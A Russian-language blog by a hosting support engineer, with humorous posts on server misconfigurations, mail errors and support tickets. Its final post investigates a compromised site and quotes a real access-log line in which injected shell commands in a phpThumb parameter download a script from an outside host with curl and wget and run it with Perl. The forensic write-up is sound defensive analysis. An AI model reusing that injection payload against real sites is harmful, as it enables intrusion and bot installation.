Ознакомьтесь с нашей политикой обработки персональных данных
  • ↓
  • ↑
  • ⇑
 
Записи с темой: Будни (список заголовков)
22:10 

Первая запись?

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
В качестве первой записи можно было бы припомнить множество перлов, скопипастить вкуснятины с внутреннего форума, но как-то лень... По этой причине с прошлым было решено решительно расстаться, да и чужое копипастить нехорошо :)
Если говорить о "свежем" (не далее, чем в этот понедельник) - когда я даю рекомендации об использовании какого-либо ПО, я обычно в комплекте предоставляю ссылку на сайт разработчиков этого ПО. В частности, был задан вопрос "Что изволит кушать мой диск?" - на что в качестве рекомендации было предложено установить и использовать такую утилиту, как atop. И здесь вышел казус - вместо страницы http://www.atoptool.nl/ клиент увидел фигу вида "ЗОБАНЕНО!" от Ростелекома. Сами они ссылаюстя либо на Тот-Самый-Реестр-Куда-Попадают-Только-Плохие-Страницы, либо на результаты судебного решения - но ни домен, ни IP-адрес в реестре не значатся, да и в субедное решение как-то слабо верится...


Что характерно, на сайте Ростелекома я не нашел ни телефона техподдержки (есть только "информационная" - подозреваю, банальный автоответчик, если судить по описанию), ни электронных способов связи, включая электронную почту. Есть форма обратной связи, где указав 100500 данных о себе (включая номер договора), можно таки кому-то что-то написать. Вот бы нам так...

@темы: будни

23:32 

Это неловкое чувство...

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
... когда сайт IT-аутсорсинговой компании ломает аутсорсный же "специалист", а ты это чинишь за "спасибо"...

Картина побоища была эпична - началось все со смены пароля mysql-пользователя, потом 10 раз менялся пароль другого (нового) пользователя и заодно несколько раз подряд менялся пароль FTP-доступа. Ну а по итогам не было ни пользователей, ни баз данных - "так не доставайся же ты никому!", зато по всей площадке лежали бекапы файлов разной свежести.
Вот такое вот "кто к нам меч продавать придет..." :)

@темы: будни, аутсорс

16:39 

Проблемы взаимопонимания

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Привет:ОРоссиивиртуальном пространстве, проблема объяснения.

Здравствуйте, мыв виртуальномтестпространстве, когдаесть проблемы, конкретные вопрос:мы указалив коде страницыесть "UTF-8", но сервер ненажать кнопку "UTF-8" для анализавеб-страниц, по умолчанию онявляется "кириллица (Windows-1251)", чтобы решить, поэтому беспорядок.Такнужнаваша помощь, чтобыизменить конфигурацию, способную выдержать егособственное определениекодировкиHTML.


Вот когда первый раз я это дело читал - возникла мысль: странно, вроде кодировка нормальная, но все равно смысл улавливаю с трудом... :)

@темы: будни

16:58 

Позитивное мышление

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Увидел "странности" в работе почтовика, связанные с резолвом доменов. Пошел к админам с вопросом, почему же он так фигово работает.

"
Это нормально, что днс не всегда резолвят. Они работают так:

"

**иногда не кажется, что некоторые люди вместо работы занимаются коллекционированием картинок с нужными ответами :)

@темы: будни, с картинками

17:15 

Неправильные пчелы и DDoS

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
...
176.102
.20.23;-;1383828674.482;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
125.194.106.131;-;1383828674.495;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
46.233.11.99;-;1383828674.508;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
203.145.185.81;-;1383828674.509;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
125.194.106.131;-;1383828674.512;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
95.132.62.135;-;1383828674.516;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
109.254.49.20;-;1383828674.525;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
188.169.118.13;-;1383828674.528;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
203.145.185.81;-;1383828674.532;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
188.169.118.13;-;1383828674.539;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
125.194.106.131;-;1383828674.540;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
37.44.83.164;-;1383828674.541;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
178.91.76.249;-;1383828674.554;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
189.91.16.7;-;1383828674.561;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/1.1
95.135.192.170;-;1383828674.568;[07/Nov/2013:12:51:14 +0000];400;ET sitename HTTP/
1.1
...

ДДоС сервера запросами "ET" :) Что печально - таки у них это получается :(


@темы: очепятки, будни

12:16 

"Почта не отправляется"

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Outlook.... ну почему...

"Отправь письмо!" - F= rejected RCPT : unable to route address: mailbox@metinvest-evrasia.com
"АААААА, КТО ЗДЕСЬ????" - incomplete transaction (connection lost) from
"Неопознанная ошибка *pokerface*"


У этой поделки микрософта много таких глюков (как и прекрасных кодах об ошибках) - то ошибки игнорирует и в результате пользователь пытается понять смысл ответа сервера "Valid RCPT must precede DATA" (вместо "you must authenticate first";), то на банальные и стандартные ошибки SMTP реагирует бурно и с истерикой. Отправить другие 10 писем из очереди? Зачем? "Неопознанная ошибка" же...

@темы: будни, маразмы

12:05 

Синонимы

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Пишу ответ пользователю, и почему-то вместо "классического" для меня словосочетания "программного обеспечения" пишу "служб" (видимо, мне было таааак лень :) )

"... описанная проблема может быть связана либо с качеством сетевого подключения, либо с работой служб, осуществляющих контроль и фильтрацию трафика (..."

И сразу захотелось в список к антивирусу и фаерволлу добавить ФСБ, Роскомнадзор... :)

@темы: будни, большой брат

16:42 

Мощность процессора

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
При прочтении описания тарифов (VDS) в отделе возникла легкая полемика на тему "процессорная мощность".
По итогам было сформулировано две мысли:

Процессорная мощность - количество теплоты, выделяемое процессором за единицу времени.
Какова же мощность процессора сервера? - 95 ватт. Честно-честно, мы спецификации на сайте интела посмотрели!

@темы: будни

16:41 

Пятница

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Если абьюзу нечего делать - он выходит на тропу войны! )

@темы: будни, с картинками

12:47 

Пятничные беседы

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Я (12:33:47 7/03/2014)
"Опять двадцать пять. Мы попадаем в спам и блок лист клиентов"
Я (12:33:51 7/03/2014)

А. (12:34:24 7/03/2014)
перестать спамить)
Я (12:34:33 7/03/2014)
так он мб и не спамит
А. (12:35:27 7/03/2014)
ну значит не ему перестать спамить
Я (12:35:55 7/03/2014)
This! Is! SHARED!!! )
А. (12:36:41 7/03/2014)
shared wareD
Я (12:36:55 7/03/2014)
shared wared malwared ))

@темы: с картинками, будни

13:20 

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Заявка от пользователя VPS - "Настраиваю отправку почты с сайта, использую msmtp и ящик находящийся на вашем же хостинге - ошибка аутентификации."
В ходе проверки было выявлено, что конфиг msmtp правильный, но нашему почтовому серверу пароль, даже введеный вручную, не нравится. У msmtp есть замечательный ключик -debug, с помощью которого можно получить SMTP-сессию с сервером и вот по этой сессии я увидел, что MD5-отклик от клиента не совпадает с откликом, который можно сгенерировать вручную. И на неправильный пароль, указанный где-то еще, не спишешь - я же догадался вручную пароль ввести при отправке письма... Шаблон начал потрескивать... Может ли MD5 считать неправильную сумму? о_О

Оказывается, может - точнее, не совсем MD5:
mail-index.netbsd.org/pkgsrc-bugs/2012/01/05/ms...

"... if msmtp is linked against OpenSSL but not GNU SASL, the OpenSSL library is not initialised which apparently causes the md5-functions to return garbage."

# msmtp --version
msmtp version 1.4.24
TLS/SSL library: OpenSSL
...
<неперводимая игра слов>
# yum update msmtp

Вот таким простым образом можно подорвать психическое здоровье администратора сервера)

@темы: будни

14:19 

Мартышка и апач

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
[user@server ~]$ /etc/rc.d/httpd start
Starting apache.
Syntax error on line 1 of /etc/apache_1.3/site.conf:
Invalid command '<?php', perhaps mis-spelled or defined by a module not included in the server configuration
[user@server ~]$ cat /etc/apache_1.3/site.conf
<?php $URL="www.blablabla.eu/ru-RU";;
header
("Location:$URL");
exit();
?>

И это прекрасно! Но не работает.


@темы: Будни, Маразмы

15:10 

Недоумение

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
[14:16] <Mercury|wrk> какого хрена
[14:16] <Mercury|wrk> человек знает, что такое символьная ссылка, но не знает, как сменить права доступа к файлу...
[14:16] <Ariman> может быть он нагуглил
[14:16] <Ariman> а второе дольше гуглить
[14:17] <Mercury|wrk> что?)
[14:17] <Mercury|wrk> не знаю, мне всегда казалось что chmod - гораздо более элементарная вещь, чем ln ))
[14:17] <Ariman> ln короче
[14:19] <Mercury|wrk> черт, ты прав :(
[14:19] <Mercury|wrk> $ echo "`man ln`" | wc -l
[14:19] <Mercury|wrk> 103
[14:19] <Mercury|wrk> $ echo "`man chmod`" | wc -l
[14:19] <Mercury|wrk> 183
[14:19] <Ariman> ^_^

@темы: будни

15:41 

Mail.ru

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
2014-04-10 09:38:41 1WY7gr-00176s-Bl <= user@server P=esmtpsa A=dovecot_login:user@server S=18890395 from for user1@list.ru user2@mail.ru
2014-04-10 09:38:54 1WY7gr-00176s-Bl ** user1@list.ru R=lookuphost T=remote_smtp: SMTP error from remote mail server after end of data: host mxs.mail.ru [94.100.180.150]: 550 virus message discarded
2014-04-10 09:38:55 1WY7gr-00176s-Bl => user2@mail.ru R=lookuphost T=remote_smtp H=mxs.mail.ru [217.69.139.150] X=TLSv1:AES256-SHA:256 C="250 OK id=1WY7hJ-0003fV-Ih

Как видно, @list.ru более параноялен, чем @mail.ru. И наоборот. Смотря к какому из айпишников сервера mxs.mail.ru подключаться :)

@темы: будни, бред

12:01 

Load Average

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Картинка по мотивам тикета (собрана на коленке в гимпе)


@темы: маразмы, будни, с картинками

16:59 

Краткое

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Внезапно подумалось, что "релей для спамеров" звучит как лозунг.

@темы: Будни, тухлое

12:55 

rc.d

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Продолжаем тему членовредительств на виртуальных серверах :)

Нормальный rc.d:
drwxr-xr-x 10 root root 4096 May 15 10:34 /etc/rc.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc0.d -> rc.d/rc0.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc1.d -> rc.d/rc1.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc2.d -> rc.d/rc2.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc3.d -> rc.d/rc3.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc4.d -> rc.d/rc4.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc5.d -> rc.d/rc5.d
lrwxrwxrwx 1 root root 10 May 15 10:34 /etc/rc6.d -> rc.d/rc6.d

rc.d курильщика:
drwxr-xr-x 10 root root 4096 May 21 2013 /etc/rc.d
lrwxrwxrwx 1 root root 10 May 21 2013 /etc/rc0.d -> rc.d/rc0.d
lrwxrwxrwx 1 root root 10 May 21 2013 /etc/rc1.d -> rc.d/rc1.d
lrwxrwxrwx 1 root root 10 May 21 2013 /etc/rc6.d -> rc.d/rc6.d

@темы: факапы, будни

22:12 

Заявки...

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Заявка на тему: не входит.

@темы: будни, с картинками

14:33 

Заявки...

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
/> Добрый день,
/> подскажите пож-та что занимает у меня на диске столько места в скрытых директориях??
/> что это за скрытые директории и для чего они??

Скрытые директории - любые директории, название которых начинается с точки. В данном случае речь идет о ~/.cagefs/tmp - каталог для хранения временных файлов.
В данном каталоге сейчас хранится более 800 тысяч файлов сессий:
-sh-4.1$ find ~/.cagefs/tmp/ | wc -l
859435
-sh-4.1$ du -sh ~/.cagefs/tmp/
3.4G ~/.cagefs/tmp/

Это говорит о том, что они не очищаются, что в настройках обработчика PHP указано некорректное значение времени жизни сессии.

-sh-4.1$ find public_html/ -name "php.ini"
public_html/site/admin/php.ini
public_html/site/php.ini
-sh-4.1$ cat public_html/site/php.ini | grep session
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 12000000;

Согласно Вашим настройкам, сессия хранится 10 лет.


@темы: будни, мисконфиг

14:58 

Это страшное слово "взлом".

An original idea. That can't be too hard. The library must be full of them. (c)Stephen Fry
Относительно недавно на хабре появилась такая статья, посвященная взломам сайтов: habrahabr.ru/company/host-tracker/blog/223877/

И я прочитал эту статью... И прочитал комментарии... Сказать, что я был одновременно взбешен и разочарован в хабражителях - это не сказать ничего. Вместо анализа проблемы, причем не возникшей черти когда - а наблюдаемой прямо в данный момент! - пользователь применил какой-то чудовищный костыль, завязанный на внешнем ресурсе (почему бы не написать аналогичный скрипт на питоне или баше и запускать кроном?), а всю ответственность за взлом сайта голословно свалил на хостера. При этом я каждый день сталкиваюсь со взломанными сайтами и случаи взлома по вине хостера можно пересчитать по пальцам руки слепого фрезеровщика - связаны обычно они с новенькими уязвимостями (из запомнившегося - у нас громко "бабахнула" несколько лет назад уязвимость обработчика PHP в режиме CGI - когда можно было выполнять произвольный код, raz0r.name/vulnerabilities/php-cgi-remote-code-...).

Но, поскольку на хабре я не зарегистрирован, то все это так и осталось в виде эмоций в голове :) За месяц эмоции поутихли, а сейчас попался более-менее интересный случай, не связанный с корявыми старыми джумлами и сотней тысяч вредоносов, которые загружались на "любимый, но никем не администрируемый сайтик" в течение нескольких лет.

Итак, пользователь получает уведомление от антивирусной системы:
~/.cagefs/tmp/af.txt: Trojan.IRCBot-1142

Сам по себе ~/.cagefs/tmp - это реализация /tmp в окружении пользователя в рамках CloudLinux.


> Пришло автоматическое сообщение о трояне на сервере. Файл удалили. Сайт проверили - все нормально. Вопрос - не заражен ли хостинг?

В принципе такие вопросы у поломанных пользователей не редки, хотя в большинстве случаев это скорее претензия-утверждение, а не вопрос. Единственное, что связывает такой вежливый стиль и откровенно хамские выкрики "из зала" - во всех случаях нет представления о том, что такое "уязвимость серверного ПО", о том, к чему оно приводит и о том, как рвут волосы на [censored] администраторы при обнаружении такого глобального факапа :) Ну а когда такое предстваление имеется - то и вопросов такого рода не возникает.

Что мы имеем? Грустную картину - файл пользователь уже грохнул, сказать что-либо о его содержимом или о времени его загрузки на сервер уже нельзя, в файлах сайта ничего интересного, при беглом взгляде в логах сайта за месяц ничего интересного... Мрак, однимо словом. О, вы только посмотрите, какая прелесть висит у юзера:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
username 624605 95.0 0.0 36460 4404 ? R Jul10 8813:12 /usr/sbin/httpd

Ура, живем! Так, а что ты, собсственно, собака, делаешь?
-sh-4.1$ lsof -p 624605
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
perl 624605 username cwd DIR 8,6 4096 37716728 /tmp
perl 624605 username rtd DIR 8,2 12288 1114390 /
perl 624605 username txt REG 8,2 6912 1125070 /usr/bin/perl
perl 624605 username mem REG 8,1 27424 2859054 /lib64/libnss_dns-2.12.so
perl 624605 username mem REG 8,1 65928 2859058 /lib64/libnss_files-2.12.so
perl 624605 username mem REG 8,2 19336 1385051 /usr/lib64/perl5/auto/IO/IO.so
perl 624605 username mem REG 8,2 127412 1384483 /usr/lib64/perl5/auto/Socket/Socket.so
perl 624605 username mem REG 8,1 424472 2859174 /lib64/libfreebl3.so
perl 624605 username mem REG 8,1 1921216 2859027 /lib64/libc-2.12.so
perl 624605 username mem REG 8,1 142640 2859076 /lib64/libpthread-2.12.so
perl 624605 username mem REG 8,1 14584 2859104 /lib64/libutil-2.12.so
perl 624605 username mem REG 8,1 40400 2859041 /lib64/libcrypt-2.12.so
perl 624605 username mem REG 8,1 596264 2859047 /lib64/libm-2.12.so
perl 624605 username mem REG 8,1 19536 2859043 /lib64/libdl-2.12.so
perl 624605 username mem REG 8,1 113432 2859050 /lib64/libnsl-2.12.so
perl 624605 username mem REG 8,1 110960 2859078 /lib64/libresolv-2.12.so
perl 624605 username mem REG 8,2 1485896 1384505 /usr/lib64/perl5/CORE/libperl.so
perl 624605 username mem REG 8,1 154520 2859214 /lib64/ld-2.12.so
perl 624605 username 0r FIFO 0,8 0t0 754682712 pipe
perl 624605 username 1w FIFO 0,8 0t0 754682933 pipe
perl 624605 username 2w FIFO 0,8 0t0 754682714 pipe
perl 624605 username 3u unix 0xffff88011ad29280 0t0 754682764 socket
perl 624605 username 4u IPv4 754683819 0t0 TCP server:58368->107.170.202.233:http (ESTABLISHED)

Да, это то, что мы ищем. Perl-скрипт, запущен из под юзера из /tmp, атакуемый ресурс имеет какое-то отноешние к IRC. Теперь осталось обратиться к логам процессов и узнать, когда он был запущен (да-да, у нас все ходы записаны!):

2014-07-10 03:10:01 username 624605 77.7 0.0 36460 4392 ? R 03:09 0:41 /usr/sbin/httpd

Теперь, когда известно время запуска, можно посмотреть, как именно он был запущен. С помощью все тех же журналов сервера - с их помощью мы определим и то, что на сервере в это время пользователь не присутствовал, и то, что в это время к сайту пользователя пришел такой интересный запрос:

109.163.234.8 - - [10/Jul/2014:03:09:04 +0400] "GET /assets/components/gallery/connector.php?action=web/phpthumb&w=800&h=800&zc=0&far=&q=90&src=%2Fassets%2Fgallery%2F204%2F3636.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;cd%20/tmp;curl%20-o%20af.txt%20thathi.com.br/af.txt;wget%20thathi.com.br/af.txt;perl%20af.txt;%20&phpThumbDebug=9 HTTP/1.1" 404 8305 "-" "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"

Вот так очередная леденящая душу история о "серверной уязвимости" на проверку оказалось банальным недосмотром разработчика или администратора сайта.

@темы: будни, накипело

Записки безумного саппорта

главная